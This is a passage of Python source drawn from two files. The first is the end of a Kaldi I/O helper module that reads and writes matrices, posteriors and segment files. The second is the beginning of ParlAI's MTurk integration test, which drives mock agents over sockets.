if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd,output_folder):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
mat = read_mat(fd,output_folder)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd,output_folder):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
col_headers = np.array([np.array([x for x in y]) * globrange * 1.52590218966964e-05 + globmin for y in col_headers], dtype=np.float32)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.zeros((cols,rows), dtype='float32')
p0 = col_headers[:, 0].reshape(-1, 1)
p25 = col_headers[:, 1].reshape(-1, 1)
p75 = col_headers[:, 2].reshape(-1, 1)
p100 = col_headers[:, 3].reshape(-1, 1)
mask_0_64 = (data <= 64)
mask_193_255 = (data > 192)
mask_65_192 = (~(mask_0_64 | mask_193_255))
mat += (p0 + (p25 - p0) / 64. * data) * mask_0_64.astype(np.float32)
mat += (p25 + (p75 - p25) / 128. * (data - 64)) * mask_65_192.astype(np.float32)
mat += (p75 + (p100 - p75) / 63. * (data - 192)) * mask_193_255.astype(np.float32)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(output_folder,file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, output_folder, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd,output_folder):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd,output_folder)
def read_post_rxspec(file_):
""" adaptor to read both 'ark:...' and 'scp:...' inputs of posteriors,
"""
if file_.startswith("ark:"):
return read_post_ark(file_)
elif file_.startswith("scp:"):
return read_post_scp(file_)
else:
print("unsupported intput type: %s" % file_)
print("it should begint with 'ark:' or 'scp:'")
sys.exit(1)
def read_post_scp(file_or_fd,output_folder):
""" generator(key,post) = read_post_scp(file_or_fd)
Returns generator of (key,post) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,post in kaldi_io.read_post_scp(file):
...
Read scp to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_scp(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
post = read_post(rxfile)
yield key, post
finally:
if fd is not file_or_fd : fd.close()
def read_post_ark(file_or_fd,output_folder):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd,output_folder):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd,output_folder)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd,output_folder):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd,output_folder):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd,output_folder)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
|
integration_test.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
"""
Script for testing complete functionality of the MTurk conversation backend.
Simulates agents and interactions and tests the outcomes of interacting with
the server to ensure that the messages that are recieved are as intended.
It pretends to act in the way that core.html is supposed to follow, both
related to what is sent and recieved, what fields are checked, etc. A change
to the core.html file will not be caught by this script.
Doesn't actually interact with Amazon MTurk as they don't offer a robust
testing framework as of September 2017, so interactions with MTurk and updating
HIT status and things of the sort are not yet supported in this testing.
"""
from parlai.core.params import ParlaiParser
from parlai.mturk.core.test.integration_test.worlds import TestOnboardWorld, \
TestSoloWorld, TestDuoWorld
from parlai.mturk.core.mturk_manager import MTurkManager, WORLD_START_TIMEOUT
from parlai.mturk.core.server_utils import setup_server, delete_server
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_state import WorkerState, AssignState
from parlai.mturk.core.agents import MTURK_DISCONNECT_MESSAGE
import parlai.mturk.core.data_model as data_model
from parlai.mturk.core.mturk_utils import create_hit_config
from socketIO_client_nexus import SocketIO
import time
import os
import importlib
import copy
import uuid
import threading
from itertools import product
from joblib import Parallel, delayed
TEST_TASK_DESCRIPTION = 'This is a test task description'
MTURK_AGENT_IDS = ['TEST_USER_1', 'TEST_USER_2']
PORT = 443
FAKE_HIT_ID = 'FAKE_HIT_ID_{}'
TASK_GROUP_ID = 'TEST_TASK_GROUP_{}'
AGENT_1_ID = 'TEST_AGENT_1'
AGENT_2_ID = 'TEST_AGENT_2'
ASSIGN_1_ID = 'FAKE_ASSIGNMENT_ID_1'
HIT_1_ID = 'FAKE_HIT_ID_1'
SOCKET_TEST = 'SOCKET_TEST'
SOLO_ONBOARDING_TEST = 'SOLO_ONBOARDING_TEST'
SOLO_NO_ONBOARDING_TEST = 'SOLO_NO_ONBOARDING_TEST'
SOLO_REFRESH_TEST = 'SOLO_REFRESH_TEST'
DUO_ONBOARDING_TEST = 'DUO_ONBOARDING_TEST'
DUO_NO_ONBOARDING_TEST = 'DUO_NO_ONBOARDING_TEST'
DUO_VALID_RECONNECT_TEST = 'DUO_VALID_RECONNECT_TEST'
DUO_ONE_DISCONNECT_TEST = 'DUO_ONE_DISCONNECT_TEST'
COUNT_COMPLETE_TEST = 'COUNT_COMPLETE_TEST'
EXPIRE_HIT_TEST = 'EXPIRE_HIT_TEST'
ALLOWED_CONVERSATION_TEST = 'ALLOWED_CONVERSATION_TEST'
UNIQUE_CONVERSATION_TEST = 'UNIQUE_CONVERSATION_TEST'
FAKE_ASSIGNMENT_ID = 'FAKE_ASSIGNMENT_ID_{}_{}'
FAKE_WORKER_ID = 'FAKE_WORKER_ID_{}_{}'
DISCONNECT_WAIT_TIME = SocketManager.DEF_SOCKET_TIMEOUT + 1.5
completed_threads = {}
start_times = {}
def dummy(*args):
pass
class MockAgent(object):
"""Class that pretends to be an MTurk agent interacting through the
webpage by simulating the same commands that are sent from the core.html
file. Exposes methods to use for testing and checking status
"""
def __init__(self, opt, hit_id, assignment_id, worker_id, task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.socketIO = None
self.always_beat = False
self.ready = False
self.wants_to_send = False
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
self.socketIO.emit(event_name, packet.as_dict())
def build_and_send_packet(self, packet_type, data, callback):
if not callback:
def callback(*args):
pass
msg = {
'id': str(uuid.uuid4()),
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data
}
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
if (packet_type == Packet.TYPE_ALIVE):
event_name = data_model.SOCKET_AGENT_ALIVE_STRING
self.socketIO.emit(event_name, msg, callback)
def send_message(self, text, callback=dummy):
if not callback:
def callback(*args):
pass
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False
}
self.wants_to_send = False
self.build_and_send_packet(Packet.TYPE_MESSAGE, data, callback)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id
}
self.build_and_send_packet(Packet.TYPE_ALIVE, data, None)
def setup_socket(self, server_url, message_handler):
"""Sets up a socket for an agent"""
def on_socket_open(*args):
self.send_alive()
def on_new_message(*args):
message_handler(args[0])
def on_disconnect(*args):
self.disconnected = True
self.socketIO = SocketIO(server_url, PORT)
# Register Handlers
self.socketIO.on(data_model.SOCKET_OPEN_STRING, on_socket_open)
self.socketIO.on(data_model.SOCKET_DISCONNECT_STRING, on_disconnect)
self.socketIO.on(data_model.SOCKET_NEW_PACKET_STRING, on_new_message)
# Start listening thread
self.listen_thread = threading.Thread(target=self.socketIO.wait)
self.listen_thread.daemon = True
self.listen_thread.start()
def send_heartbeat(self):
"""Sends a heartbeat to the world"""
hb = {
'id': str(uuid.uuid4()),
'receiver_id': '[World_' + self.task_group_id + ']',
'assignment_id': self.assignment_id,
'sender_id' : self.worker_id,
'conversation_id': self.conversation_id,
'type': Packet.TYPE_HEARTBEAT,
'data': None
}
self.socketIO.emit(data_model.SOCKET_ROUTE_PACKET_STRING, hb)
def wait_for_alive(self):
last_time = time.time()
while not self.ready:
self.send_alive()
time.sleep(0.5)
assert time.time() - last_time < 10, \
'Timed out wating for server to acknowledge {} alive'.format(
self.worker_id
)
def handle_setup(opt):
"""Prepare the heroku server without creating real hits"""
create_hit_config(
task_description=TEST_TASK_DESCRIPTION,
unique_worker=False,
is_sandbox=True
)
# Poplulate files to copy over to the server
task_files_to_copy = []
task_directory_path = os.path.join(
opt['parlai_home'],
'parlai',
'mturk',
'core',
'test',
'integration_test'
)
task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
for mturk_agent_id in MTURK_AGENT_IDS + ['onboarding']:
task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
# Setup the server with a likely-unique app-name
task_name = '{}-{}'.format(str(uuid.uuid4())[:8], 'integration_test')
server_task_name = \
''.join(e for e in task_name if e.isalnum() or e == '-')
server_url = \
setup_server(server_task_name, task_files_to_copy)
return server_task_name, server_url
def handle_shutdown(server_task_name):
delete_server(server_task_name)
def wait_for_state_time(seconds, mturk_manager):
seconds_done = 0
while (seconds_done < seconds):
if mturk_manager.socket_manager.alive:
seconds_done += 0.1
time.sleep(0.1)
def run_solo_world(opt, mturk_manager, is_onboarded):
MTURK_SOLO_WORKER = 'MTURK_SOLO_WORKER'
# Runs the solo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
workers[0].id = MTURK_SOLO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
task = opt['task']
mturk_agent = workers[0]
world = TestSoloWorld(opt=opt, task=task, mturk_agent=mturk_agent)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except:
raise
finally:
pass
def run_duo_world(opt, mturk_manager, is_onboarded):
MTURK_DUO_WORKER = 'MTURK_DUO_WORKER'
# Runs the solo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for worker in workers:
worker.id = MTURK_DUO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
world = TestDuoWorld(opt=opt, agents=workers)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except:
raise
finally:
pass
def make_packet_handler_cant_task(agent, on_ack, on_hb, on_msg):
"""A packet handler that is unable to switch into task worlds"""
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
if agent.always_beat:
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
if not agent.always_beat:
pass
elif not packet.data['conversation_id'].startswith('t_'):
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
else:
agent.always_beat = False
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def make_packet_handler(agent, on_ack, on_hb, on_msg):
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def check_status(input_status, desired_status):
assert input_status == desired_status, 'Expected to be in {}, was found ' \
'in {}'.format(desired_status, input_status)
def check_new_agent_setup(agent, mturk_manager,
status=AssignState.STATUS_ONBOARDING):
mturk_agent = mturk_manager.mturk_workers[agent.worker_id]
assert mturk_agent is not None, \
'MTurk manager did not make a worker state on alive'
mturk_assign = mturk_agent.agents[agent.assignment_id]
assert mturk_assign is not None, \
'MTurk manager did not make an assignment state on alive'
assert mturk_assign.state.status == status, \
'MTurk manager did not move the agent into {}, stuck in {}'.format(
status, mturk_assign.state.status
)
connection_id = mturk_assign.get_connection_id()
assert mturk_manager.socket_manager.socket_is_open(connection_id), \
'The socket manager didn\'t open a socket for this agent'
def test_socket_manager(opt, server_url):
global completed_threads
TEST_MESSAGE = 'This is a test'
task_group_id = TASK_GROUP_ID.format('TEST_SOCKET')
socket_manager = None
world_received_alive = False
world_received_message = False
agent_timed_out = False
def world_on_alive(pkt):
nonlocal world_received_alive
# Assert alive packets contain the right data
worker_id = pkt.data['worker_id']
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
hit_id = pkt.data['hit_id']
assert hit_id == HIT_1_ID, 'HIT id was {}'.format(hit_id)
assign_id = pkt.data['assignment_id']
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
conversation_id = pkt.data['conversation_id']
assert conversation_id == None, \
'Conversation id was {}'.format(conversation_id)
# Start a channel
socket_manager.open_channel(worker_id, assign_id)
# Note that alive was successful
world_received_alive = True
def world_on_new_message(pkt):
nonlocal world_received_message
text = pkt.data['text']
assert text == TEST_MESSAGE, 'Received text was {}'.format(text)
world_received_message = True
def world_on_socket_dead(worker_id, assign_id):
nonlocal agent_timed_out
assert worker_id == AGENT_1_ID, 'Worker id was {}'.format(worker_id)
assert assign_id == ASSIGN_1_ID, 'Assign id was {}'.format(assign_id)
agent_timed_out = True
return True
socket_manager = SocketManager(
server_url,
PORT,
world_on_alive,
world_on_new_message,
world_on_socket_dead,
task_group_id
)
agent_got_response_heartbeat = False
received_messages = 0
did_ack = False
agent = MockAgent(opt, HIT_1_ID, ASSIGN_1_ID, AGENT_1_ID, task_group_id)
connection_id = '{}_{}'.format(AGENT_1_ID, ASSIGN_1_ID)
def agent_on_message(pkt):
nonlocal agent_got_response_heartbeat
nonlocal received_messages
nonlocal agent
if pkt['type'] == Packet.TYPE_HEARTBEAT:
agent_got_response_heartbeat = True
elif pkt['type'] == Packet.TYPE_MESSAGE:
if received_messages != 0:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
received_messages += 1
elif pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
def manager_on_message_ack(pkt):
nonlocal did_ack
did_ack = True
agent.setup_socket(server_url, agent_on_message)
time.sleep(1)
# Wait for socket to open to begin testing
agent.wait_for_alive()
assert socket_manager.socket_is_open(connection_id), \
'Channel was not properly opened for connecting agent'
# send some content from the agent
time.sleep(1)
agent.send_heartbeat()
time.sleep(1)
agent.send_message(TEST_MESSAGE, None)
time.sleep(1)
# Send some content from the socket manager, don't ack the first
# time to ensure that resends work, and ensure the callback is
# eventually called
test_blocking_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
socket_manager.get_my_sender_id(),
AGENT_1_ID,
ASSIGN_1_ID,
'',
None,
True,
True,
manager_on_message_ack
)
# Send packet and wait for it to arrive the first time
socket_manager.queue_packet(test_blocking_packet)
# Wait for socket to open to begin testing
last_time = time.time()
while received_messages == 0:
time.sleep(0.5)
assert time.time() - last_time < 10, \
'Timed out wating for server to send message'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_SENT, \
'Packet sent but status never updated'
# wait for resend to occur
time.sleep(2.5)
assert did_ack, 'Socket_manager\'s message ack callback never fired'
assert socket_manager.get_status('Fake_id') == Packet.STATUS_ACK, \
'Packet recieved but status never updated'
# Ensure queues are properly set up and that reopening an open socket
# does nothing
assert len(socket_manager.queues) == 1, \
'More queues were opened than expected for the connecting agent'
socket_manager.open_channel(AGENT_1_ID, ASSIGN_1_ID)
assert len(socket_manager.queues) == 1, \
'Second open for the worker was not idempotent'
time.sleep(8.5)
# Ensure all states happened and that the agent eventually disconnected
assert world_received_alive, 'World never received alive message'
assert world_received_message, 'World never received test message'
assert agent_timed_out, 'Agent did not timeout'
assert agent_got_response_heartbeat, 'Agent never got response heartbeat'
# Close channels and move on
socket_manager.close_all_channels()
assert not socket_manager.socket_is_open(connection_id), \
'Channel was not closed with close_all_channels'
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
assert len(socket_manager.queues) == 0, \
'Queues were not cleared on close, {} found'.format(
len(socket_manager.queues)
)
assert len(socket_manager.threads) == 0, \
'Threads were not cleared on close, {} found'.format(
len(socket_manager.threads)
)
# Test to make sure can't send a packet to a closed channel
test_packet = Packet(
'Fake_id',
Packet.TYPE_MESSAGE,
AGENT_1_ID,
socket_manager.get_my_sender_id(),
ASSIGN_1_ID,
''
)
socket_manager.queue_packet(test_packet)
assert len(socket_manager.packet_map) == 0, \
'Packets were not cleared on close, {} found'.format(
len(socket_manager.packet_map)
)
completed_threads[SOCKET_TEST] = True
def test_solo_with_onboarding(opt, server_url):
"""Tests solo task with onboarding to completion, as well as disconnect in
onboarding to ensure the agent is marked disconnected.
"""
global completed_threads
print('{} Starting'.format(SOLO_ONBOARDING_TEST))
opt['task'] = SOLO_ONBOARDING_TEST
hit_id = FAKE_HIT_ID.format(SOLO_ONBOARDING_TEST)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(SOLO_ONBOARDING_TEST, 2)
worker_id = FAKE_WORKER_ID.format(SOLO_ONBOARDING_TEST, 1)
connection_id_1 = '{}_{}'.format(worker_id, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id, assign_id_2)
last_command = None
message_num = 0
expected_messages = [
TestOnboardWorld.TEST_TEXT_1, TestOnboardWorld.TEST_TEXT_2,
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids = [mturk_agent_id]
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, True))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_fail = \
MockAgent(opt, hit_id, assign_id_1, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_fail, dummy, dummy, msg_callback)
test_agent_fail.setup_socket(server_url, message_handler)
test_agent_fail.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_fail, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_1]
assign_state = mturk_manager_assign.state
# Run through onboarding, then disconnect and reconnect
test_agent_fail.always_beat = True
test_agent_fail.send_heartbeat()
wait_for_state_time(3, mturk_manager)
assert test_agent_fail.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
wait_for_state_time(2, mturk_manager)
test_agent_fail.send_message('Hello1', dummy)
test_agent_fail.always_beat = False
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
# Refresh the agent
test_agent_fail.conversation_id = None
test_agent_fail.send_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_INACTIVE_HIT, \
'Agent disconnected in onboarding didn\'t get inactive hit'
assert assign_state.status == AssignState.STATUS_DISCONNECT, \
'Disconnected agent not marked as so in state'
assert mturk_manager_assign.disconnected == True, \
'Disconnected agent not marked as so in agent'
# Connect with a new agent and finish onboarding
last_command = None
message_num = 0
test_agent = MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state = mturk_manager_assign.state
# Run through onboarding
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
